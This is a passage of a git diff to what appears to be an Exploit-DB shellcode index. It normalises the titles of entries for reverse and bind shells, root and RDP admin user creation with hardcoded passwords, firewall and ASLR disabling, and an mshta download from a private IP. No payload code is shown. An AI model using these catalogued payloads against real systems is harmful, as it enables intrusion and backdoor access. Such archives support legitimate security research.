Shellcode (120 bytes)",2019-08-19,"Gonçalo Ribeiro",shellcode,linux_x86-64 -47292,shellcodes/linux_x86-64/47292.c,"Linux/x86_64 - AVX2 XOR Decoder + execve(_/bin/sh_) Shellcode (62 bytes)",2019-08-19,"Gonçalo Ribeiro",shellcode,linux_x86-64 +47292,shellcodes/linux_x86-64/47292.c,"Linux/x86_64 - execve(_/bin/sh_) + AVX2 XOR Decoder Shellcode (62 bytes)",2019-08-19,"Gonçalo Ribeiro",shellcode,linux_x86-64 47296,shellcodes/linux/47296.c,"Linux/MIPS64 - Reverse (localhost:4444/TCP) Shell Shellcode (157 bytes)",2019-08-20,antonio,shellcode,linux -47352,shellcodes/linux_x86/47352.c,"Linux/x86 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Byte Free Shellcode (107 Bytes)",2019-09-05,guly,shellcode,linux_x86 -47396,shellcodes/linux_x86/47396.c,"Linux/x86 - Bind TCP (port 43690) Null-Free Shellcode (53 Bytes)",2019-09-17,"Daniel Ortiz",shellcode,linux_x86 -47461,shellcodes/linux_x86/47461.c,"Linux/x86 - NOT + XOR-N + Random Encoded /bin/sh Shellcode (132 bytes)",2019-10-04,bolonobolo,shellcode,linux_x86 +47352,shellcodes/linux_x86/47352.c,"Linux/x86 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (107 Bytes)",2019-09-05,guly,shellcode,linux_x86 +47396,shellcodes/linux_x86/47396.c,"Linux/x86 - Bind (43690/TCP) + Null-Free Shellcode (53 Bytes)",2019-09-17,"Daniel Ortiz",shellcode,linux_x86 +47461,shellcodes/linux_x86/47461.c,"Linux/x86 - execve(/bin/sh) + NOT + XOR-N + Random Encoded Shellcode (132 bytes)",2019-10-04,bolonobolo,shellcode,linux_x86 47473,shellcodes/arm/47473.c,"Linux/ARM - Fork Bomb Shellcode (20 bytes)",2019-10-08,CJHackerz,shellcode,arm -47481,shellcodes/linux_x86/47481.c,"Linux/x86 - Add User to /etc/passwd Shellcode (59 bytes)",2019-10-10,VL43CK,shellcode,linux_x86 -47511,shellcodes/linux_x86/47511.c,"Linux/x86 - adduser (User) to /etc/passwd Shellcode (74 bytes)",2019-10-16,bolonobolo,shellcode,linux_x86 -47513,shellcodes/linux_x86/47513.c,"Linux/x86 - execve /bin/sh Shellcode (25 bytes)",2019-10-16,bolonobolo,shellcode,linux_x86 -47514,shellcodes/linux_x86/47514.c,"Linux/x86 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Byte Free Shellcode (91 bytes)",2019-10-16,bolonobolo,shellcode,linux_x86 -47530,shellcodes/linux_x86/47530.txt,"Linux/x86 - execve(/bin/sh) socket reuse Shellcode (42 bytes)",2019-10-22,WangYihang,shellcode,linux_x86 -47564,shellcodes/linux_x86/47564.py,"Linux/x86 - (NOT|ROT+8 Encoded) execve(/bin/sh) null-free Shellcode (47 bytes)",2019-10-30,"Daniel Ortiz",shellcode,linux_x86 -47784,shellcodes/linux_x86-64/47784.txt,"Linux/x64 - Reverse (192.168.55.42:443/TCP) Shell + Stager + Null-Byte Free Shellcode (188 bytes)",2019-12-17,"Lee Mazzoleni",shellcode,linux_x86-64 -47877,shellcodes/linux_x86/47877.c,"Linux/x86 - Execve() Alphanumeric Shellcode (66 bytes)",2020-01-06,bolonobolo,shellcode,linux_x86 -47890,shellcodes/linux_x86/47890.c,"Linux/x86 - Random Bytes Encoder + XOR/SUB/NOT/ROR execve(/bin/sh) Shellcode (114 bytes)",2020-01-08,"Xenofon Vassilakopoulos",shellcode,linux_x86 -47953,shellcodes/windows/47953.c,"Windows/7 - Screen Lock Shellcode (9 bytes)",2020-01-22,"Saswat Nayak",shellcode,windows +47481,shellcodes/linux_x86/47481.c,"Linux/x86 - Add Root User (vl43ck/test) To /etc/passwd Shellcode (59 bytes)",2019-10-10,VL43CK,shellcode,linux_x86 +47511,shellcodes/linux_x86/47511.c,"Linux/x86 - adduser (User) To /etc/passwd Shellcode (74 bytes)",2019-10-16,bolonobolo,shellcode,linux_x86 +47513,shellcodes/linux_x86/47513.c,"Linux/x86 - execve(/bin/sh) Shellcode (25 bytes)",2019-10-16,bolonobolo,shellcode,linux_x86 +47514,shellcodes/linux_x86/47514.c,"Linux/x86 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (91 bytes)",2019-10-16,bolonobolo,shellcode,linux_x86 +47530,shellcodes/linux_x86/47530.txt,"Linux/x86 - execve(/bin/sh) Socket Reuse Shellcode (42 bytes)",2019-10-22,WangYihang,shellcode,linux_x86 +47564,shellcodes/linux_x86/47564.py,"Linux/x86 - execve(/bin/sh) + NOT|ROT+8 Encoded + Null-Free Shellcode (47 bytes)",2019-10-30,"Daniel Ortiz",shellcode,linux_x86 +47784,shellcodes/linux_x86-64/47784.txt,"Linux/x64 - Reverse (192.168.55.42:443/TCP) Shell + Stager + Null-Free Shellcode (188 bytes)",2019-12-17,"Lee Mazzoleni",shellcode,linux_x86-64 +47877,shellcodes/linux_x86/47877.c,"Linux/x86 - execve() + Alphanumeric Shellcode (66 bytes)",2020-01-06,bolonobolo,shellcode,linux_x86 +47890,shellcodes/linux_x86/47890.c,"Linux/x86 - execve(/bin/sh) + Random Bytes Encoder + XOR/SUB/NOT/ROR Shellcode (114 bytes)",2020-01-08,"Xenofon Vassilakopoulos",shellcode,linux_x86 +47953,shellcodes/windows_x86-64/47953.c,"Windows/x64 (7) - Screen Lock Shellcode (9 bytes)",2020-01-22,"Saswat Nayak",shellcode,windows_x86-64 47980,shellcodes/windows_x86/47980.txt,"Windows/x86 - Dynamic Bind Shell + Null-Free Shellcode (571 Bytes)",2020-01-30,boku,shellcode,windows_x86 48032,shellcodes/linux_x86/48032.py,"Linux/x86 - Bind Shell Generator Shellcode (114 bytes)",2020-02-10,boku,shellcode,linux_x86 -48116,shellcodes/windows_x86/48116.c,"Windows/x86 - Null-Free WinExec Calc.exe Shellcode (195 bytes)",2020-02-24,boku,shellcode,windows_x86 +48116,shellcodes/windows_x86/48116.c,"Windows/x86 - WinExec Calc.exe + Null-Free Shellcode (195 bytes)",2020-02-24,boku,shellcode,windows_x86 48229,shellcodes/windows_x86-64/48229.txt,"Windows/x64 - Dynamic MessageBoxA or MessageBoxW PEB & Import Table Method Shellcode (232 bytes)",2020-03-18,boku,shellcode,windows_x86-64 -48243,shellcodes/linux_x86/48243.txt,"Linux/x86 - 'reboot' polymorphic Shellcode (26 bytes)",2020-03-23,Upayan,shellcode,linux_x86 +48243,shellcodes/linux_x86/48243.txt,"Linux/x86 - Reboot + Polymorphic Shellcode (26 bytes)",2020-03-23,Upayan,shellcode,linux_x86 48252,shellcodes/windows_x86-64/48252.txt,"Windows/x64 - WinExec Add-Admin (ROOT/I@mR00T$) Dynamic Null-Free Shellcode (210 Bytes)",2020-03-25,boku,shellcode,windows_x86-64 -48355,shellcodes/windows_x86/48355.c,"Windows/x86 - MSVCRT System + Dynamic Null-free + Add RDP Admin + Disable Firewall + Enable RDP Shellcode (644 Bytes)",2020-04-21,boku,shellcode,windows_x86 -48379,shellcodes/linux_x86-64/48379.c,"Linux/x64 - Password (P3WP3Wl4ZerZ) + Bind (0.0.0.0:4444/TCP) Shell (/bin/bash) + Null-free Shellcode (272 Bytes)",2020-04-24,boku,shellcode,linux_x86-64 -48585,shellcodes/arm/48585.c,"Linux/ARM - execve /bin/dash Shellcode (32 bytes)",2020-06-15,"Anurag Srivastava",shellcode,arm +48355,shellcodes/windows_x86/48355.c,"Windows/x86 - MSVCRT System + Dynamic Null-Free + Add RDP Admin (MajinBuu/TurnU2C@ndy!!) + Disable Firewall + Enable RDP Shellcode (644 Bytes)",2020-04-21,boku,shellcode,windows_x86 +48379,shellcodes/linux_x86-64/48379.c,"Linux/x64 - Bind (0.0.0.0:4444/TCP) Shell (/bin/bash) + Password (P3WP3Wl4ZerZ) + Null-free Shellcode (272 Bytes)",2020-04-24,boku,shellcode,linux_x86-64 +48585,shellcodes/arm/48585.c,"Linux/ARM - execve(/bin/dash) Shellcode (32 bytes)",2020-06-15,"Anurag Srivastava",shellcode,arm 48586,shellcodes/arm/48586.c,"Linux/ARM - Bind (0.0.0.0:1337/TCP) Shell (/bin/sh) + Null-Free Shellcode (100 bytes)",2020-06-15,"Anurag Srivastava",shellcode,arm -48592,shellcodes/linux_x86/48592.c,"Linux/x86 - ASLR deactivation polymorphic Shellcode (124 bytes)",2020-06-17,"Xenofon Vassilakopoulos",shellcode,linux_x86 +48592,shellcodes/linux_x86/48592.c,"Linux/x86 - Disable ASLR Security + Polymorphic Shellcode (124 bytes)",2020-06-17,"Xenofon Vassilakopoulos",shellcode,linux_x86 48703,shellcodes/linux_x86/48703.c,"Linux/x86 - Egghunter(0x50905090) + sigaction + execve(/bin/sh) Shellcode (35 bytes)",2020-07-26,danf42,shellcode,linux_x86 -48718,shellcodes/windows_x86/48718.c,"Windows/x86 - Download using mshta.exe Shellcode (100 bytes)",2020-07-26,"Siddharth Sharma",shellcode,windows_x86 +48718,shellcodes/windows_x86/48718.c,"Windows/x86 - Download File (http://192.168.43.192:8080/9MKWaRO.hta) Via mshta Shellcode (100 bytes)",2020-07-26,"Siddharth Sharma",shellcode,windows_x86 49416,shellcodes/linux/49416.txt,"Linux/x86 - Bind (0.0.0.0:13377/TCP) Shell (/bin/sh) Shellcode (65 bytes)",2021-01-12,ac3,shellcode,linux diff --git a/shellcodes/windows/47953.c b/shellcodes/windows_x86-64/47953.c similarity index 100% rename from shellcodes/windows/47953.c rename to shellcodes/windows_x86-64/47953.c